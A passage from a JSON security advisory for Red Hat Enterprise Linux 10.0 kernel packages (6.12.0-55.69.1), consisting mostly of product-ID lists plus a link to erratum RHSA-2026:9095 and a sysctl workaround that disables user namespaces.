"RT-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
],
"restart_required": {
"category": "machine"
},
"url": "https://access.redhat.com/errata/RHSA-2026:9095"
},
{
"category": "workaround",
"details": "In order to trigger the issue, it requires the ability to create user/net namespaces.\n\nOn non-containerized deployments of Red Hat Enterprise Linux 8, it is recommended to disable user namespaces by setting user.max_user_namespaces to 0:\n\n# echo \"user.max_user_namespaces=0\" \u003e /etc/sysctl.d/userns.conf\n# sysctl -p /etc/sysctl.d/userns.conf\n\nOn containerized deployments, such as Red Hat OpenShift Container Platform, do not use this mitigation as the functionality is needed to be enabled.",
"product_ids": [
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
